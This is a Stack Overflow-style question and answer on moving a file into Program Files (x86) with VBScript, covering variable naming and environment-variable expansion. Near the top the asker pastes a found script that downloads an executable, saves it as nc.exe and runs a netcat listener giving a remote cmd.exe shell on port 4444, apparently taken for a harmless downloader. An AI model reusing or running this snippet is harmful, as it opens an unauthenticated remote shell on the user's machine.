# Move command in VBScript destination is program file (x86) "changed to download to (x86)

Tags: vbscript

Please hold all responses.  Just found something.

```
dim http_obj
dim stream_obj
dim shell_obj

set http_obj = CreateObject("Microsoft.XMLHTTP")
set stream_obj = CreateObject("ADODB.Stream")
set shell_obj = CreateObject("WScript.Shell")

URL = "http://www.mikemurr.com/example.exe" 'Where to download the file from
FILENAME = "nc.exe" 'Name to save the file (on the local system)
RUNCMD = "nc.exe -L -p 4444 -e cmd.exe" 'Command to run after downloading

http_obj.open "GET", URL, False
http_obj.send

stream_obj.type = 1
stream_obj.open
stream_obj.write http_obj.responseBody
stream_obj.savetofile FILENAME, 2

shell_obj.run RUNCMD
```

So my many lines of vbs, and strings it will open (or not) along the way currently has a vbs that opens an url to download something with instructions on where to save, and than when done, moves from download folder to programs (x86) but it looks like i found something that will download the file to (x86) for me.  I will see what it takes to download to special folder.

I do know my next struggle will be getting the vbs to wait.

In dos

```
start/wait drive:\path\file.exe
```

waits for the install to finish before moving on to next task.

```
Set WshShell = WScript.CreateObject("Wscript.Shell")
MsgBox "1:1"
Sub2
Sub3
Sub Sub2()
    WshShell.Run "cscript //nologo Sub2.vbs", 1, True
End Sub
Sub Sub3()
    WshShell.Run "cscript //nologo Sub3.vbs", 1, True
End Sub
```

Has me creating many vbs files to run in order, which I haven't tested yet.  So I don't know if each one will wait till the program has finished installing or if I need to create a loop to see if the exe is still running.

I do have a "learning vbs" folder with examples to modify to build from.  I'm expanding as I learn and testing.

---

I can't move a file from desktop to program file (X86) due to errors

```
Set sh  = CreateObject("WScript.Shell")
desktop = sh.SpecialFolders("Desktop")
Program Files (x86) = sh.SpecialFolders("Program Files (x86)")

Set fso = CreateObject("Scripting.FileSystemObject")
source      = fso.BuildPath(desktop, "file to move")
     'not sure if I need to add extension
destination = fso.BuildPath("Program Files (x86)", "\path\sub folder")
fso.MoveFile source & "\*", destination & "\"
```

Error mismatch files

And if I remove "" around program files (x86) for destination

```
Set sh  = CreateObject("WScript.Shell")
desktop = sh.SpecialFolders("Desktop")
Program Files (x86) = sh.SpecialFolders("Program Files (x86)")

Set fso = CreateObject("Scripting.FileSystemObject")
source      = fso.BuildPath(desktop, "file to move")
     'not sure if I need to add extension
destination = fso.BuildPath(Program Files (x86), "\path\sub folder")
fso.MoveFile source & "\*", destination & "\"
```

I get ejected ) error.  What am I missing?

EDITING: From response below

As has already been pointed out, Program Files (x86) = ... isn't valid syntax. Variable names must not contain spaces, and parentheses are only allowed when declaring array variables. Also, the SpecialFolders collection does not have a member "Program Files (x86)".

Expand the respective environment variable instead:

```
Set sh  = CreateObject("WScript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")

src = fso.BuildPath(sh.SpecialFolders("Desktop"), "file to move")
dst = sh.ExpandEnvironmentStrings("%ProgramFiles(x86)%\path\sub folder")

fso.MoveFile src & "\*", dst & "\"
```

Also, your command tries to move the content of the folder "file to move". Is that intentional? If you wanted to move a file " file to move" you'd have to change the last statement to fso.MoveFile src, dst & "\".

```
Also, your command tries to move the content of the folder "file to move"
```

MY COMMENT:

No, "file to move" fallowed by 'not sure if I should include extension is the name of the file (i.e myfile.extension) not "folder" file to move.  The folder is "desktop"

```
desktop = sh.SpecialFolders("Desktop")
```

and

```
source      = fso.BuildPath(desktop, "file to move")
         'not sure if I need to add extension
```

thus do i put

```
source      = fso.BuildPath(desktop, "file to move.extension")
```

I'm not looking for someone to write the code for me.  I have tried the %path% thing that works in dos (i.e %userprofile%) in vbs before and got stuck so to see

```
dst = sh.ExpandEnvironmentStrings("%ProgramFiles(x86)%\path\sub folder")
```

has me scratching my head. Even with the expand command.

Doing some testing.  Will edit with update.  Sorry for late response.  Weekend hobby project thing.

Comment: `Program Files (x86)` is not a valid variable name in vbscript.

Answer (score 1):

As has already been pointed out, `Program Files (x86) = ...` isn't valid syntax. Variable names must not contain spaces, and parentheses are only allowed when declaring array variables. Also, the [`SpecialFolders` collection](https://msdn.microsoft.com/en-us/library/0ea7b5xe.aspx) does not have a member `"Program Files (x86)"`.

Expand the respective environment variable instead:

```
Set sh  = CreateObject("WScript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")

src = fso.BuildPath(sh.SpecialFolders("Desktop"), "file to move")
dst = sh.ExpandEnvironmentStrings("%ProgramFiles(x86)%\path\sub folder")

fso.MoveFile src & "\*", dst & "\"
```

Also, your command tries to move the content of the *folder* "file to move". Is that intentional? If you wanted to move a *file* " file to move" you'd have to change the last statement to `fso.MoveFile src, dst & "\"`.